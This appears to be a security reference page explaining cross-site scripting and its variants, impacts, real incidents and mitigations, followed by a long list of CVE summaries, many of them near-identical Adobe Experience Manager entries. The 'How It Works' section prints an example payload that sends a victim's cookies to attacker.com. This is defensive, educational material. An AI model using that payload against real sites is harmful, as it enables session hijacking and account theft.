Cross-Site Scripting
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.
How It Works
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding. The attacker crafts input containing JavaScript code, which the application then incorporates into its HTML response. When a victim's browser renders this response, it executes the injected script as if it were legitimate code from the trusted website.
The attack manifests in three main variants. Reflected XSS occurs when malicious script arrives via an HTTP parameter (like a search query) and immediately bounces back in the response—typically delivered through phishing links. Stored XSS is more dangerous: the payload persists in the application's database (in comment fields, user profiles, forum posts) and executes whenever anyone views the infected content. DOM-based XSS happens entirely client-side when JavaScript code improperly handles user-controllable data, modifying the DOM in unsafe ways without ever sending the payload to the server.
A typical attack flow starts with the attacker identifying an injection point—anywhere user input appears in HTML output. They craft a payload like <script>document.location='http://attacker.com/steal?c='+document.cookie</script> and inject it through the vulnerable parameter. When victims access the page, their browsers execute this script within the security context of the legitimate domain, giving the attacker full access to cookies, session tokens, and DOM content.
Impact
- Session hijacking: Steal authentication cookies to impersonate victims and access their accounts
- Credential harvesting: Inject fake login forms on trusted pages to capture usernames and passwords
- Account takeover: Perform state-changing actions (password changes, fund transfers) as the authenticated victim
- Keylogging: Monitor and exfiltrate everything users type on the compromised page
- Phishing and malware distribution: Redirect users to malicious sites or deliver drive-by downloads from a trusted domain
- Data exfiltration: Access and steal sensitive information visible in the DOM or retrieved via AJAX requests
Real-World Examples
A stored XSS vulnerability in Twitter (2010) allowed attackers to create self-propagating worms. Users hovering over malicious tweets automatically retweeted them and followed the attacker, creating viral spread through the platform's legitimate functionality.
eBay suffered from persistent XSS flaws in product listings (CVE-2015-2880) where attackers embedded malicious scripts in item descriptions. Buyers viewing these listings had their sessions compromised, enabling unauthorized purchases and account takeover.
British Airways faced a sophisticated supply chain attack (2018) where attackers injected JavaScript into the airline's payment page. The script skimmed credit card details from 380,000 transactions, demonstrating how XSS enables payment fraud at massive scale.
Mitigation
- Context-aware output encoding: HTML-encode for HTML context, JavaScript-encode for JS strings, URL-encode for URLs—never use generic escaping
- Content Security Policy (CSP): Deploy strict CSP headers to whitelist script sources and block inline JavaScript execution
- HTTPOnly and Secure cookie flags: Prevent JavaScript access to session cookies and ensure transmission over HTTPS only
- Input validation: Reject unexpected characters and patterns, though this is defense-in-depth, not primary protection
- DOM-based XSS prevention: Use safe APIs like
textContentinstead ofinnerHTML; avoid passing user data to dangerous sinks likeeval()
Recent CVEs (38829)
Stored cross-site scripting in Red Hat's migration-planner-ui-app (kubev2v project) allows an authenticated attacker who can register a discovery agent to inject a javascript: URI into the agent's credentialUrl field, which executes in another organizational user's browser when they click the resulting link in the UI. No public exploit identified at time of analysis, but the upstream fix (PR #750) and Red Hat Bugzilla entry confirm the issue is real and patched via a safeExternalUrl protocol allowlist. Successful exploitation hijacks the victim's Red Hat SSO session and enables cross-tenant data access and API actions.
Stored XSS in Jenkins 2.483-2.567 and LTS 2.492.1-2.555.2 allows attackers holding Agent/Configure permission to inject persistent malicious scripts via the `POST config.xml` API by supplying an unescaped generic offline cause description. When any Jenkins user views the affected agent page, the payload executes in their browser, enabling session hijacking or unauthorized actions within the Jenkins instance. No public exploit or CISA KEV listing has been identified, and EPSS probability is low at 0.02%, reflecting the constrained attack surface from the required permission prerequisite.
Reflected cross-site scripting in the WPZOOM Portfolio WordPress plugin (versions up to and including 1.4.21) allows remote attackers to execute arbitrary JavaScript in a victim's browser when the user clicks a crafted link. Because the CVSS scope is Changed (S:C), successful exploitation can affect resources beyond the vulnerable component, typically enabling session hijacking or actions against the WordPress admin context. No public exploit identified at time of analysis, and the issue is not on the CISA KEV list.
HTML injection in the 'fetch links' alert email feature of Thinkst Canarytokens allows unauthenticated remote attackers to embed malicious HTML and JavaScript into notification emails delivered to token owners (defenders). The vulnerability is notable because it weaponizes the deception platform's own alert mechanism against the security operators relying on it - turning a defensive tool into a phishing vector. Proof-of-concept exploit code exists (CVSS 4.0 E:P), though the vulnerability is not listed in CISA KEV and the CVSS 4.0 base score of 2.0 reflects the limited, interaction-dependent impact.
Stored Cross-Site Scripting in the Easy Image Collage WordPress plugin (all versions through 1.13.6) allows authenticated attackers with author-level access to permanently inject arbitrary JavaScript into pages via the `grid[properties][borderColor]` and `grid[images][N][attachment_url]` parameters, which executes in victims' browsers upon page load. The critical aggravating factor is that payloads are persisted via WordPress's `update_post_meta()` API rather than through post content, which deliberately sidesteps the `unfiltered_html` capability check that normally prevents lower-privilege users from injecting raw HTML - meaning site administrators cannot block this attack path through standard WordPress role controls alone. No public exploit code or CISA KEV listing has been identified at time of analysis; however, the low privilege requirement and well-documented bypass of WordPress hardening make this a credible threat on multi-author sites.
Stored Cross-Site Scripting in the MW WP Form WordPress plugin (all versions through 5.1.3) allows authenticated editor-level attackers to inject persistent malicious scripts via the 'memo' parameter that execute in the browsers of any user who views the affected contact data page. The vulnerability is made possible by a specific bypass of WordPress Core sanitization: because memo values are stored via update_post_meta() rather than wp_insert_post(), the native wp_kses_post() and unfiltered_html capability checks are never invoked, permitting editors - who are normally prevented from injecting raw HTML - to break out of the textarea element using injected closing tags. No public exploit has been identified at time of analysis, and the CVSS 4.4 Medium score reflects the high privilege and high complexity prerequisites.
Stored Cross-Site Scripting in the aThemes Addons for Elementor WordPress plugin (versions up to and including 1.1.8) allows authenticated attackers with contributor-level access to inject persistent malicious scripts via the 'title_tag' widget setting in the Posts Timeline and Posts Carousel widgets. The injected payload executes in the browsers of any user who subsequently visits the compromised page, enabling session hijacking, credential theft, or malicious redirects. No public exploit or CISA KEV listing has been identified at time of analysis, though the contributor-level authentication barrier is low in multi-author WordPress deployments.
Stored Cross-Site Scripting in Store Locator WordPress plugin before 1.6.6 allows administrator-level users to inject persistent malicious scripts into the plugin's admin settings page, with execution triggered when any privileged user visits the page. Critically, this bypass works even when WordPress's `unfiltered_html` capability is restricted - a control commonly enforced in multisite networks - meaning a subsite admin could target visiting super admins. A publicly available exploit exists via WPScan, though no active exploitation has been confirmed by CISA KEV. CVSS rates this 3.5 (Low), but multisite deployments face materially higher practical risk.
Stored cross-site scripting in the Anti-Spam by CleanTalk Spam Protection WordPress plugin before 6.79 allows unauthenticated remote attackers to inject arbitrary JavaScript into approved comments via a custom shortcode in the email-encoding feature, with execution occurring when any visitor or administrator views the affected post. Publicly available exploit code exists per WPScan, increasing exposure for the plugin's large WordPress installation base, though it requires user interaction (UI:R) to trigger the payload. The high CVSS score of 8.8 reflects the potential for administrator account compromise leading to full site takeover.
DOM-Based Stored Cross-Site Scripting in the Animation Addons for Elementor WordPress plugin (all versions up to and including 2.6.7) allows authenticated attackers holding Contributor-level access or higher to inject persistent malicious scripts through multiple unsanitized plugin parameters. The injected payload executes in the browsers of any user who subsequently loads an affected page, enabling session hijacking, credential theft, or malicious redirects. No public exploit identified at time of analysis and the plugin is not listed in the CISA KEV catalog, but the Changed scope (S:C) in the CVSS vector elevates real-world impact beyond the 6.4 score suggests for multi-author WordPress deployments.
Cross-site scripting in Spring Security's SAML 2.0 relying party support allows an attacker who can influence RelyingPartyRegistration values to inject malicious content into HTML forms generated by Spring Security filters, potentially leading to script execution in a victim's browser. The advisory and tagging characterize this as an XSS issue with possible code-execution implications in the browser context, affecting Spring Security 5.7.x through 7.0.x prior to the fixed maintenance releases. No public exploit identified at time of analysis and the issue is not listed in CISA KEV.
Stored cross-site scripting in OpenEMR before 8.0.0.1 lets an authenticated patient portal user inject HTML/JavaScript into demographic fields via the PUT api/patient/:num endpoint, which fires later in a clinician's authenticated session when the prescription CSS/HTML multi-print feature renders the patient name and address without output encoding. Because the payload executes inside the main OpenEMR UI under the clinician's session, the attacker crosses the patient-to-clinician trust boundary and can steal CSRF tokens, exfiltrate session data, and perform privileged actions as the clinician. SSVC currently rates exploitation as POC, no public exploit identified at time of analysis, and EPSS is 0.03% (9th percentile), but the cross-tenant trust crossing in a healthcare app makes the issue material for any internet-exposed deployment.
Stored XSS in Adobe ColdFusion (2023.x through 2023.19 and 2025.x through 2025.8) enables a low-privileged attacker on an adjacent network to inject persistent malicious JavaScript into vulnerable form fields. When a victim user browses to the page containing the stored payload, the script executes in their browser context, with scope change indicating impact can extend beyond the immediate ColdFusion application - such as session hijacking or unauthorized browser-side actions. No public exploit code or CISA KEV listing has been identified at time of analysis; EPSS data was not provided in source intelligence.
Reflected cross-site scripting in OSCAL-GUI allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by delivering a crafted URL containing a malicious payload in the `project` request parameter. The injected input breaks out of both JavaScript string and HTML attribute context within the body onload event handler, granting attacker-controlled script execution in the victim's session. No active exploitation is confirmed (not in CISA KEV), but a public GitHub gist documenting the issue exists, suggesting POC-level detail is openly accessible.
Reflected XSS in Evoluted PHP Directory Listing Script through version 4.0.5 allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by delivering a crafted URL. The `dir` parameter in `index.php` is rendered unsanitized in two distinct HTML contexts: the page `<title>` element and breadcrumb `<a href>` attributes, each enabling distinct injection techniques — title context breakout and event handler injection respectively. No public exploit has been confirmed via CISA KEV, though a proof-of-concept gist is referenced in the NVD advisory data, indicating exploit code may be publicly accessible.
Universal cross-site scripting (UXSS) in Mozilla Focus and Klar for iOS allows remote attackers to inject script into the context of arbitrary web origins by abusing WebKit navigation handling in the browser. The flaw, reported by Mozilla and tracked as EUVD-2026-35837, was corrected in Focus for iOS 151.3.1 and Klar for iOS 151.3.1. EPSS is very low (0.02%, 5th percentile) and there is no public exploit identified at time of analysis, but the CVSS of 7.5 reflects the high confidentiality impact achievable with no privileges.
Reflected cross-site scripting in OpenClinic GA 5.351.19's DICOM image upload handler allows unauthenticated remote attackers to execute arbitrary JavaScript in authenticated users' browsers by embedding payloads in DICOM file metadata fields such as Study Description, which are reflected unsanitized through popup.jsp and archiving/uploadfiles_jsp.java. A publicly available proof-of-concept exists, and the researcher's published chain explicitly demonstrates escalation from this XSS primitive to remote code execution, materially elevating the real-world severity beyond the CVSS 5.3 score. No public exploit identified as confirmed actively exploited (CISA KEV) at time of analysis, but the healthcare context and documented RCE chain make this a high-priority finding for any OpenClinic GA deployment.
Reflected cross-site scripting in OSCAL-GUI allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by injecting payloads through the unsanitized `project` parameter in `oscal-forms.php`. The parameter is URL-decoded and passed without sanitization into an error message via the `Messages()` function in `oscal-functions.php`, which is then reflected directly into the HTML response body when the supplied project ID does not match any existing record. A publicly available proof-of-concept exploit exists; the vulnerability is not confirmed in CISA KEV, and real-world impact is constrained by the CVSS UI:A requirement for victim interaction, making targeted phishing the primary delivery mechanism.
Stored cross-site scripting in Ellucian Banner Self-Service before the April T2 2025 release (2025-04-23) allows low-privileged authenticated Banner ERP users to persist malicious JavaScript in faculty and course data fields via missing HTML encoding at the DOM insertion point. Payloads planted in fields such as faculty displayName, emailAddress, subjectDescription, or courseTitle are subsequently served through the unauthenticated getFacultyMeetingTimes API and execute in any victim's browser that renders course search results. No public exploit code has been identified at time of analysis, and the vulnerability is not listed in CISA KEV.
Reflected XSS in Ellucian Banner Self-Service allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by injecting unsanitized content via the `toDateFormat` parameter of the publicly accessible `dateConverter` endpoint. The CVSS vector (PR:N, S:C) confirms no credentials are needed to craft the attack and that the impact crosses security boundaries into the victim's browser session, enabling session hijacking or credential theft against higher-education users. No public exploit has been identified and this is not listed in CISA KEV, but the unauthenticated endpoint and simple social-engineering delivery path make this practically exploitable with low attacker skill.
Cross-site scripting in Microsoft SharePoint Server (2016, 2019, and Subscription Edition) enables an authenticated attacker with low-level network access to inject malicious scripts into SharePoint-generated web pages, resulting in spoofing attacks against other users. The vulnerability requires victim interaction to trigger script execution, limiting automated exploitation. No public exploit code has been identified and this vulnerability is not listed in the CISA KEV catalog at time of analysis; the CVSS score of 4.6 reflects the constrained impact and authentication prerequisite.
Cross-site scripting in Microsoft SharePoint Server (2016, 2019, and Subscription Edition) enables low-privileged authenticated attackers to perform spoofing attacks over a network without requiring user interaction. The CVSS vector (AV:N/AC:L/PR:L/UI:N) confirms network-reachable exploitation by any authenticated SharePoint user with no further interaction required from a victim. No public exploit identified at time of analysis and CISA SSVC classifies exploitation status as none, though vendor patches are available for all three affected product lines.
Stored XSS in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, and 2026.04 and earlier allows a low-privileged authenticated attacker to inject persistent malicious JavaScript into vulnerable form fields. When any user - including higher-privileged administrators - browses a page containing the injected field, the script executes in their browser under the AEM origin, with scope change (S:C per CVSS) enabling impact beyond the authoring component itself. No public exploit code or active exploitation has been identified at time of analysis; however, the persistent nature of the injection and AEM's typical enterprise deployment profile (admin, author, and reviewer roles sharing the same domain) elevate practical risk above what the medium CVSS score alone suggests.
Stored XSS in Adobe Experience Manager (AEM) versions up to 2026.04 allows a low-privileged authenticated attacker to persist malicious JavaScript in vulnerable form fields, which executes in any victim's browser upon visiting the affected page. The CVSS S:C (Scope Changed) flag elevates the practical risk: a low-privileged content author could target administrators browsing the same AEM instance, enabling session hijacking or privilege escalation beyond the raw 5.4 Medium score implies. No public exploit identified at time of analysis; Adobe has published advisory APSB26-56 addressing the issue.
Stored XSS in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, and 2026.04 and earlier enables a low-privileged authenticated attacker to inject persistent malicious JavaScript into vulnerable form fields. When a victim - potentially a higher-privileged user such as an administrator - browses to the affected page, the injected script executes in their browser context, enabling session token theft, credential harvesting, or actions performed on the victim's behalf. No public exploit code has been identified and this CVE is not listed in the CISA KEV catalog at time of analysis; however, the CVSS S:C (Scope Changed) designation signals that the real-world impact exceeds what the raw 5.4 Medium score implies, particularly in environments where low-privileged contributors can submit content reviewed by administrators.
Stored Cross-Site Scripting in Adobe Experience Manager (AEM) versions up to and including 6.5.24, LTS SP1, and 2026.04 enables a low-privileged authenticated attacker to persist malicious JavaScript into vulnerable form fields. The injected script executes in the browser of any victim who subsequently visits the affected page, with a changed scope designation (S:C) indicating the impact crosses security boundaries beyond the directly vulnerable component. No public exploit code or CISA KEV listing has been identified at time of analysis, but the combination of low privilege requirements and changed scope makes this a meaningful risk in multi-tenant or large-organization AEM deployments where content authoring access is broadly distributed.
Stored Cross-Site Scripting in Adobe Experience Manager versions 6.5.24, LTS SP1, and 2026.04 and earlier enables an authenticated low-privileged attacker - such as a content editor - to persist malicious JavaScript payloads into vulnerable form fields. The injected script executes in the browser of any victim who subsequently browses to the affected page, with scope change (S:C) indicating the attack crosses from the author context into the victim's browser security context. No public exploit code has been identified and this vulnerability is not listed in CISA KEV at time of analysis.
DOM-based Cross-Site Scripting in Adobe Experience Manager (AEM) versions up to and including 6.5.24, LTS SP1, and 2026.04 allows a low-privileged authenticated attacker to execute arbitrary JavaScript in a victim's browser by manipulating the DOM environment through a crafted webpage. The CVSS scope change (S:C) indicates impact can extend beyond the vulnerable AEM component itself - for instance, to other browser-accessible resources or session contexts. No public exploit code or CISA KEV listing has been identified at time of analysis; exploitation requires deliberate social engineering to induce user interaction.
DOM-based Cross-Site Scripting in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, and 2026.04 and earlier allows a low-privileged authenticated attacker to inject and execute malicious JavaScript within a victim's browser by manipulating the client-side DOM environment. The CVSS scope change (S:C) is the critical risk amplifier here: injected script executes outside the originating component's security boundary, potentially enabling session hijacking, credential theft, or privilege escalation against higher-privileged AEM users such as administrators. This CVE is not listed in the CISA KEV catalog and no public exploit code has been identified at time of analysis.
DOM-based Cross-Site Scripting in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, and 2026.04 and earlier allows a low-privileged, authenticated attacker to execute malicious JavaScript within a victim's browser by manipulating the DOM environment of a crafted webpage. The CVSS Scope:Changed indicator confirms this vulnerability crosses the security boundary from the AEM application into the victim's browser context, enabling session hijacking, credential theft, or unauthorized actions on behalf of the victim. No public exploit code or CISA KEV listing has been identified at time of analysis; however, Adobe has published advisory APSB26-56 acknowledging the issue.
DOM-based XSS in Adobe Experience Manager (AEM) versions up to 6.5.24, LTS SP1, and 2026.04 allows an authenticated low-privileged attacker to inject malicious JavaScript that executes entirely within the victim's browser via client-side DOM manipulation. The changed scope (S:C) in the CVSS vector means successful exploitation can reach session tokens, cookies, or resources beyond the directly vulnerable AEM component - a meaningful risk amplifier in enterprise content authoring environments. Exploitation requires user interaction (UI:R), meaning the attacker must social-engineer a victim into visiting a crafted webpage. No public exploit identified at time of analysis, and CISA KEV listing has not been confirmed.
DOM-based Cross-Site Scripting in Adobe Experience Manager (AEM) versions up to and including 6.5.24, LTS SP1, and 2026.04 allows a low-privileged authenticated attacker to execute arbitrary JavaScript in a victim's browser by inducing them to visit a crafted webpage. The changed scope (S:C in the CVSS vector) indicates the injected script escapes the AEM application boundary and executes in the victim's browser context, enabling session hijacking, credential harvesting, or further client-side attacks. No public exploit code has been identified at time of analysis, and this vulnerability is not listed in the CISA KEV catalog.
DOM-based Cross-Site Scripting in Adobe Experience Manager (versions 6.5.24, LTS SP1, and 2026.04 and earlier) allows a low-privileged authenticated attacker to inject and execute malicious JavaScript in a victim's browser by manipulating client-side DOM sinks. The CVSS scope-changed flag (S:C) indicates the injected script can operate beyond the vulnerable component's security context, enabling session theft, credential harvesting, or unauthorized administrative actions against higher-privileged users within the same AEM instance. No public exploit code has been identified and no CISA KEV listing exists at time of analysis, but the cross-privilege escalation potential in shared AEM deployments warrants prompt patching.
DOM-based Cross-Site Scripting in Adobe Experience Manager (versions up to and including 6.5.24, LTS SP1, and 2026.04) enables an authenticated attacker to inject and execute arbitrary JavaScript in a victim's browser by manipulating the DOM environment with attacker-controlled input. The CVSS Scope:Changed designation indicates the injected script can affect resources beyond the AEM application boundary - including session tokens and cross-origin interactions - elevating the practical impact beyond a simple content injection. No public exploit identified at time of analysis and no CISA KEV listing; Adobe has released advisory APSB26-56 addressing this issue.
DOM-based Cross-Site Scripting in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, and 2026.04 and earlier allows an authenticated attacker with low privileges to execute arbitrary JavaScript in a victim's browser by manipulating the DOM environment through a crafted webpage. The CVSS vector confirms scope change (S:C), meaning the injected script can affect browser contexts beyond the vulnerable AEM page itself - enabling session hijacking, credential theft, or unauthorized actions performed as the victim. No public exploit code or active exploitation has been identified at time of analysis, and exploitation requires user interaction, limiting opportunistic mass exploitation.
DOM-based Cross-Site Scripting in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, 2026.04 and earlier allows an authenticated low-privileged attacker to inject and execute malicious JavaScript within a victim's browser by manipulating client-side DOM processing. The CVSS scope change (S:C) indicates the exploit can break out of the originating page's security context, enabling session hijacking or cross-origin actions against higher-privileged users. No public exploit identified at time of analysis, and this CVE is not currently listed in the CISA KEV catalog.
DOM-based Cross-Site Scripting in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, and 2026.04 and earlier allows a low-privileged authenticated attacker to execute arbitrary JavaScript within a victim's browser by manipulating the client-side DOM environment. The CVSS scope change (S:C) is a notable signal - injected script executes outside the attacker's own security context, enabling session hijacking or privilege escalation against higher-privileged users such as AEM administrators. No active exploitation has been confirmed (not in CISA KEV) and no public exploit code has been identified at time of analysis.
DOM-based Cross-Site Scripting in Adobe Experience Manager (versions 6.5.24, LTS SP1, and 2026.04 and earlier) allows an authenticated low-privilege attacker to inject and execute malicious JavaScript in a victim's browser by luring them to a crafted webpage. The CVSS Scope:Changed designation (S:C) confirms the injected script can affect browser contexts beyond the vulnerable page itself, elevating potential impact beyond the C:L/I:L ratings alone suggest. No public exploit identified at time of analysis, and this vulnerability is not listed in the CISA KEV catalog.
Stored Cross-Site Scripting in Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier allows a low-privileged authenticated attacker to inject persistent malicious JavaScript into vulnerable form fields. When any user browses to a page containing the poisoned field, the script executes in their browser context. The CVSS scope change (S:C) signals that exploitation crosses a security boundary - a content-authoring account can target higher-privileged administrative sessions - amplifying the effective impact beyond the medium CVSS score of 5.4. No public exploit or CISA KEV listing has been identified at time of analysis.
DOM-based Cross-Site Scripting in Adobe Experience Manager (versions 6.5.24, LTS SP1, and 2026.04 and earlier) allows an authenticated attacker to inject and execute arbitrary JavaScript in a victim's browser by manipulating the client-side DOM environment. The CVSS scope change (S:C) confirms the injected script executes in the victim's browser context - separate from the vulnerable AEM application - enabling session hijacking, credential theft, or unauthorized actions on behalf of the victim. Exploitation requires low privileges (authenticated attacker) and user interaction (victim must visit a crafted webpage); no public exploit identified at time of analysis.
DOM-based Cross-Site Scripting in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, and 2026.04 and earlier enables an authenticated remote attacker to inject and execute arbitrary JavaScript within a victim's browser session by manipulating the client-side DOM environment. The CVSS Scope:Changed rating confirms the vulnerability crosses the security boundary from the AEM application into the victim's browser context, enabling theft of session tokens, credential harvesting, or malicious redirects. No active exploitation has been confirmed by CISA KEV and no public exploit code has been identified at time of analysis.
DOM-based Cross-Site Scripting in Adobe Experience Manager (versions 6.5.24, LTS SP1, 2026.04 and earlier) enables an authenticated attacker to inject malicious JavaScript into a victim's browser by manipulating the client-side DOM environment. The CVSS scope change (S:C) confirms the injected script can affect browser context beyond the AEM application boundary - a hallmark of XSS elevation into session hijacking or admin pivot. Exploitation requires low-privilege authenticated access and user interaction; no public exploit identified at time of analysis and this vulnerability is not listed in CISA KEV.
DOM-based Cross-Site Scripting in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, and 2026.04 and earlier allows an authenticated attacker to deliver a crafted webpage that, when visited by a victim, executes arbitrary JavaScript within the victim's browser context. The CVSS scope change (S:C) indicates impact crosses the security boundary of the vulnerable AEM component into the victim's browser session, enabling session hijacking, credential theft, or unauthorized actions on behalf of the victim. No public exploit identified at time of analysis; SSVC assessment marks exploitation as none and the attack as not automatable.
DOM-based Cross-Site Scripting in Adobe Experience Manager allows an authenticated, low-privileged attacker to execute arbitrary JavaScript in a victim's browser by enticing them to visit a crafted webpage. Affected versions span the 6.5.x line through 6.5.24, the LTS SP1 branch, and all cloud releases through 2026.04. The Scope:Changed CVSS attribute indicates the injected script can affect resources beyond the originating AEM context - elevating the practical impact above what the 5.4 Medium score alone suggests. No public exploit code and no CISA KEV listing have been identified at time of analysis.
DOM-based Cross-Site Scripting in Adobe Experience Manager (versions up to and including 6.5.24, LTS SP1, and 2026.04) allows an authenticated low-privilege attacker to execute arbitrary JavaScript in a victim's browser by directing them to a crafted webpage. The scope-changed rating (S:C) indicates the injected script's impact escapes the vulnerable AEM component boundary, potentially compromising session data or other browser-accessible resources belonging to the victim. No public exploit code has been identified and no active exploitation is confirmed by CISA KEV at time of analysis.
Stored Cross-Site Scripting in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, and 2026.04 and earlier allows a low-privileged authenticated attacker to permanently inject malicious JavaScript into vulnerable form fields within the CMS. When any user - including administrators - browses the page hosting the tampered field, the injected script executes in their browser under the application's security context, with scope change (S:C) enabling impact beyond the originating component. No public exploit has been identified at time of analysis and the vulnerability is not listed in CISA KEV, but the low attack complexity and broad AEM deployment surface make patching a priority for enterprise environments.
Stored Cross-Site Scripting in Adobe Experience Manager (AEM) 6.5.24, LTS SP1, and 2026.04 and earlier allows a low-privileged authenticated attacker to inject persistent malicious scripts into vulnerable form fields within the CMS authoring interface. When a higher-privileged user such as an administrator subsequently browses to the page hosting the injected content, the JavaScript executes in their browser session under a changed security scope, enabling potential session hijacking or privilege escalation. No public exploit code or active exploitation confirmed by CISA KEV has been identified at time of analysis; Adobe has issued security advisory APSB26-56 addressing this issue.
Stored Cross-Site Scripting in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, and 2026.04 and earlier enables a low-privileged authenticated attacker to inject persistent malicious JavaScript into vulnerable form fields. When any user browses to the affected page, the script executes in their browser under a changed scope (S:C), meaning the injected payload escapes the attacker's own session context and impacts other users - enabling session hijacking, credential harvesting, or unauthorized AEM actions on their behalf. No public exploit code or CISA KEV listing has been identified at time of analysis.
Stored Cross-Site Scripting in Adobe Experience Manager allows a low-privileged authenticated attacker to inject persistent malicious JavaScript into vulnerable form fields. When any user - including higher-privileged administrators - browses to the affected page, the injected script executes in their browser, potentially enabling session hijacking, credential theft, or unauthorized actions on their behalf. No public exploit code or CISA KEV listing has been identified at time of analysis, but the low attack complexity and scope-changed rating elevate real-world concern for multi-tenant AEM deployments.
Stored Cross-Site Scripting in Adobe Experience Manager (versions 6.5.24, LTS SP1, and 2026.04 and earlier) enables a low-privileged authenticated attacker to persistently inject malicious JavaScript into vulnerable form fields within the CMS. When any victim - potentially a higher-privileged editor or administrator - browses to the page containing the injected content, the script executes in their browser context, with scope change (S:C) indicating the impact crosses AEM's security boundary into the victim's browser. No public exploit identified at time of analysis, and this vulnerability is not currently listed in CISA KEV.
Stored Cross-Site Scripting in Adobe Experience Manager allows a low-privileged authenticated attacker to inject persistent malicious JavaScript into vulnerable form fields, which subsequently executes in any victim's browser upon visiting the affected page. Affected versions include AEM 6.5.24, LTS SP1, and 2026.04 and earlier. The scope-changed CVSS designation reflects the cross-context impact typical of stored XSS - compromising the victim's browser session rather than just the server-side application. No public exploit code or CISA KEV listing has been identified at time of analysis.
Stored Cross-Site Scripting in Adobe Experience Manager (AEM) 2026.04 and earlier enables a low-privileged authenticated attacker to inject persistent malicious JavaScript into vulnerable form fields. When any user - including administrators - browses to a page containing the injected content, the script executes in their browser under a changed security scope (S:C), potentially compromising confidentiality and integrity of the victim's session. No public exploit code has been identified at time of analysis, and this CVE is not listed in the CISA KEV catalog; however, AEM's widespread enterprise deployment and the low barrier of entry (low-privilege account only) make this a meaningful risk in environments where untrusted or lightly vetted users have authoring or form-editing access.
Stored XSS in Adobe Experience Manager (versions 6.5.24, LTS SP1, and 2026.04 and earlier) allows a low-privileged authenticated attacker to inject persistent malicious JavaScript into vulnerable form fields within the platform's content authoring interface. When a victim - typically an administrator or higher-privileged user - browses the page containing the injected field, the script executes in their browser, enabling session hijacking, credential theft, or unauthorized privileged actions. No public exploit has been identified at time of analysis and this vulnerability is not listed in CISA KEV; however, the changed scope (S:C) in the CVSS vector elevates the effective impact beyond the originating component, making this a meaningful risk in environments with untrusted low-privilege authors.
Stored Cross-Site Scripting in Adobe Experience Manager (versions 6.5.24, LTS SP1, and 2026.04 and earlier) enables low-privileged authenticated attackers to inject persistent malicious JavaScript into vulnerable form fields, which then executes in the browsers of users who visit the affected pages. The CVSS Scope:Changed designation means injected scripts can breach the security context of the AEM application itself, potentially affecting other browser-accessible resources. No public exploit identified at time of analysis, and the vulnerability is not listed in CISA KEV.
Stored Cross-Site Scripting in Adobe Experience Manager allows a low-privileged authenticated attacker to inject persistent malicious JavaScript into vulnerable form fields, which executes in other users' browsers upon page load. Affected versions span the 6.5.x branch through 6.5.24, the LTS SP1 track, and cloud-native releases through 2026.04. No public exploit code or active exploitation has been identified at time of analysis; however, the changed scope (S:C) elevates real-world impact by enabling session hijacking or credential theft against higher-privileged users such as authors or administrators.
Stored Cross-Site Scripting in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, 2026.04 and earlier allows a low-privileged authenticated attacker to inject persistent malicious JavaScript into vulnerable form fields. When any user browses a page containing the poisoned field, the script executes in their browser - with scope change (S:C) meaning the injected payload can affect resources and sessions beyond the origin of the vulnerable component itself. No public exploit identified at time of analysis, and the vulnerability is not listed in the CISA KEV catalog.
Stored Cross-Site Scripting in Adobe Experience Manager (versions up to and including 6.5.24, LTS SP1, and 2026.04) allows a low-privileged authenticated attacker to persist malicious JavaScript in vulnerable form fields. When a victim - such as an administrator - browses a page containing the injected payload, the script executes in their browser session, enabling session hijacking, credential theft, or privilege escalation within the AEM instance. The CVSS Scope:Changed designation elevates practical risk above the medium base score of 5.4, as impact extends beyond the attacker's own session to the victim's browser context. No public exploit code and no CISA KEV listing have been identified at time of analysis.
Stored Cross-Site Scripting in Adobe Experience Manager (AEM) versions up to and including 6.5.24, LTS SP1, and 2026.04 enables a low-privileged authenticated attacker to inject persistent malicious JavaScript into vulnerable form fields. When any victim user subsequently browses to the page hosting the injected content, the script executes in their browser - outside AEM's security boundary (CVSS S:C, scope changed) - enabling session hijacking, credential theft, or unauthorized actions on behalf of the victim. No public exploit identified at time of analysis, and the vulnerability is not listed in CISA KEV.
Stored Cross-Site Scripting in Adobe Experience Manager allows a low-privileged authenticated attacker to inject persistent malicious JavaScript into vulnerable form fields, which executes in any victim's browser upon page visit. Affected versions span the 6.5.x LTS line through 6.5.24 and LTS SP1, as well as cloud-service releases through 2026.04. The CVSS Scope:Changed designation confirms the payload can affect browser contexts beyond the attacker's own session - elevating concern for privilege escalation against higher-privileged users such as administrators. No public exploit identified at time of analysis and no CISA KEV listing observed.
Stored Cross-Site Scripting in Adobe Experience Manager (versions 6.5.24, LTS SP1, and 2026.04 and earlier) enables a low-privileged authenticated attacker to persist malicious JavaScript payloads inside vulnerable form fields. When a higher-privileged user - such as an administrator or editor - later browses the affected page, the injected script executes in their browser context, potentially enabling session hijacking, credential theft, or unauthorized actions on the victim's behalf. The CVSS Scope:Changed designation confirms the exploit transcends the attacker's own privilege boundary; no public exploit has been identified and CISA SSVC assessment rates exploitation as none at time of analysis.
Stored Cross-Site Scripting in Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, and 2026.04 and earlier enables a low-privileged authenticated attacker to persist malicious JavaScript inside vulnerable form fields, which subsequently executes in any victim's browser upon visiting the affected page. The CVSS scope-change flag (S:C) reflects that the injected code breaks out of AEM's server-side security boundary and runs in the victim's browser context, enabling session hijacking or credential theft against higher-privileged users such as administrators. No public exploit identified at time of analysis and the vulnerability is not listed in the CISA KEV catalog; however, the low attack complexity and broad AEM enterprise deployment surface make this a credible lateral-escalation vector inside organizations.
